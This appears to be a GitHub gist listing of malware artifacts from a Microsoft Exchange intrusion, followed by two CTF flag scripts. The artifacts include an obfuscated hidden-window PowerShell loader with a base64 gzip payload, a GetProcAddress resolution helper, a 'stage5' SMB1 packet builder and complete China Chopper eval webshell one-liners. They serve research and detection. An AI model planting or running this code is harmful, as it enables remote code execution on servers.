tehmasta
/ initial_foothold.bat
Created
January 6, 2023 19:40
— forked from JohnHammond/initial_foothold.bat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c if([IntPtr] | |
| ::Size -eq 4){=:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{= | |
| 'powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Ar | |
| guments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamRe | |
| ader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert] | |
| ::FromBase64String(''H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9Y | |
| KwwBTj4HC4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaM | |
| jWK49GhfcB05YKEnSiTcOjpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVc | |
| OKcWKtuOGiDtTIo/t9WPXYaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeM | |
| s9ml9iqOL8/o4yhwfDcDaFpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen |
tehmasta
/ powershell_process_starter.ps1
Created
January 6, 2023 19:40
— forked from JohnHammond/powershell_process_starter.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $s = New-Object System.Diagnostics.ProcessStartInfo; | |
| $s.FileName = $b; | |
| $s.Arguments='-noni -nop -w hidden -c |
tehmasta
/ powershell_other_stage.ps1
Created
January 6, 2023 19:40
— forked from JohnHammond/powershell_other_stage.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sOH { | |
| Param ($o73, $icO) | |
| $zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO)) | |
| } | |
| function b9MW { | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True)] [Type[]] $feiNr, |
tehmasta
/ stage5_deobfuscated_188.166.162.201_update.png.ps1
Created
January 6, 2023 19:40
— forked from JohnHammond/stage5_deobfuscated_188.166.162.201_update.png.ps1
Microsoft Exchange Post-Exploitation Artifacts stage #5
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function make_smb1_anonymous_login_packet { | |
| [Byte[]] $pkt = [Byte[]] (0x00) | |
| $pkt += 0x00,0x00,0x48 | |
| $pkt += 0xff,0x53,0x4D,0x42 | |
| $pkt += 0x73 | |
| $pkt += 0x00,0x00,0x00,0x00 | |
| $pkt += 0x18 | |
| $pkt += 0x01,0x48 | |
| $pkt += 0x00,0x00 | |
| $pkt += 0x00,0x00,0x00,0x00 |
tehmasta
/ powershell_data.ps1
Created
January 6, 2023 19:40
— forked from JohnHammond/powershell_data.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| &([scriptblock]::create(( | |
| New-Object IO.StreamReader( | |
| New-Object IO.Compression.GzipStream(( | |
| New-Object IO.MemoryStream(, | |
| [Convert]::FromBase64String( | |
| ''...BASE64GZIPDATA...'' | |
| ))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
tehmasta
/ base64_blob.txt
Created
January 6, 2023 19:40
— forked from JohnHammond/base64_blob.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4HC4Jh0+9/3jg1p | |
| qqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcO | |
| jpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVcOKcWKtuOGiDtTIo/t9WPX | |
| YaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeMs9ml9iqOL8/o4yhwfDcDa | |
| FpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen2Lo8o3qC6HlGUxomN0i12 | |
| UVbvOZFH0B3yl6Bl0xRHwVIUQWwbr5FQi3JCJO53zAgD9FCB9qtKwnMlkBrSVJSgii/TNGMvJ+igyL8S | |
| Jyu8CE9ZfIDt28nxybFf8WR1ZU6fEwVGR4v9GEFswjDO8F7uAydLnAluHBqnBUxrozRH4vIJWa7mIzxI | |
| pZ8baFbSIBs/3K/nsLaYxNhbgk5Zz1roPIxabOPnxOwgH0eoU0TOBrsV94TXYEY+Qfs065XYAMIS+HID | |
| eR1EUOBQhhyr9gu17gbTJ101x8RDqeJCqTKICqoo/hjMoRgCr0cm2gBMhznQr+YD41ElXbK8qLyzOQjx | |
| beJkmcQNczhyrsTZyCHIkzglynC5peQ03g/57+GaOaHYdTJamVuKT0CWDttxlNE0d6F0kPzITpCLHcKw |
tehmasta
/ powershell_architecture_check.ps1
Created
January 6, 2023 19:40
— forked from JohnHammond/powershell_architecture_check.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if ([IntPtr]::Size -eq 4) { | |
| $b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe' | |
| }else{ | |
| $b='powershell.exe' | |
| }; |
tehmasta
/ get_flag.py
Created
January 6, 2023 18:54
— forked from JohnHammond/get_flag.py
Codefest CTF 2018 "Polyglot" get_flag Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import re | |
| h = open('secret.c') | |
| lines = [ x[:-1] for x in h.readlines() ] # remove newline char | |
| h.close() | |
| flag = [] | |
| for line in lines: | |
| num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0') |
tehmasta
/ china_chopper_webshells.csv
Created
January 6, 2023 18:54
— forked from JohnHammond/china_chopper_webshells.csv
Microsoft Exchange Incident "China Chopper" ASPX Webshell filenames
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Occurrences | Webshell Filename | WebShell Syntax | |
|---|---|---|---|
| 46 | C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
| 35 | C:\inetpub\wwwroot\aspnet_client\discover.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
| 21 | C:\inetpub\wwwroot\aspnet_client\shell.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script> | |
| 13 | C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
| 8 | C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script> | |
| 7 | C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx | http://f/<script language= |
tehmasta
/ get_flag.sh
Created
January 6, 2023 18:54
— forked from JohnHammond/get_flag.sh
IceCTF 'ilovebees' Get Flag script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| exiftool -b favicon/00000.png | dd bs=1 skip=156 | head -c -84 2>/dev/null > file | |
| for i in {00001..00109} | |
| do | |
| exiftool -b favicon/$i.png | dd bs=1 skip=156 | head -c -84 2>/dev/null >> file | |
| done | |
| strings file | grep -i "IceCTF" --color=none | tail -n 1 |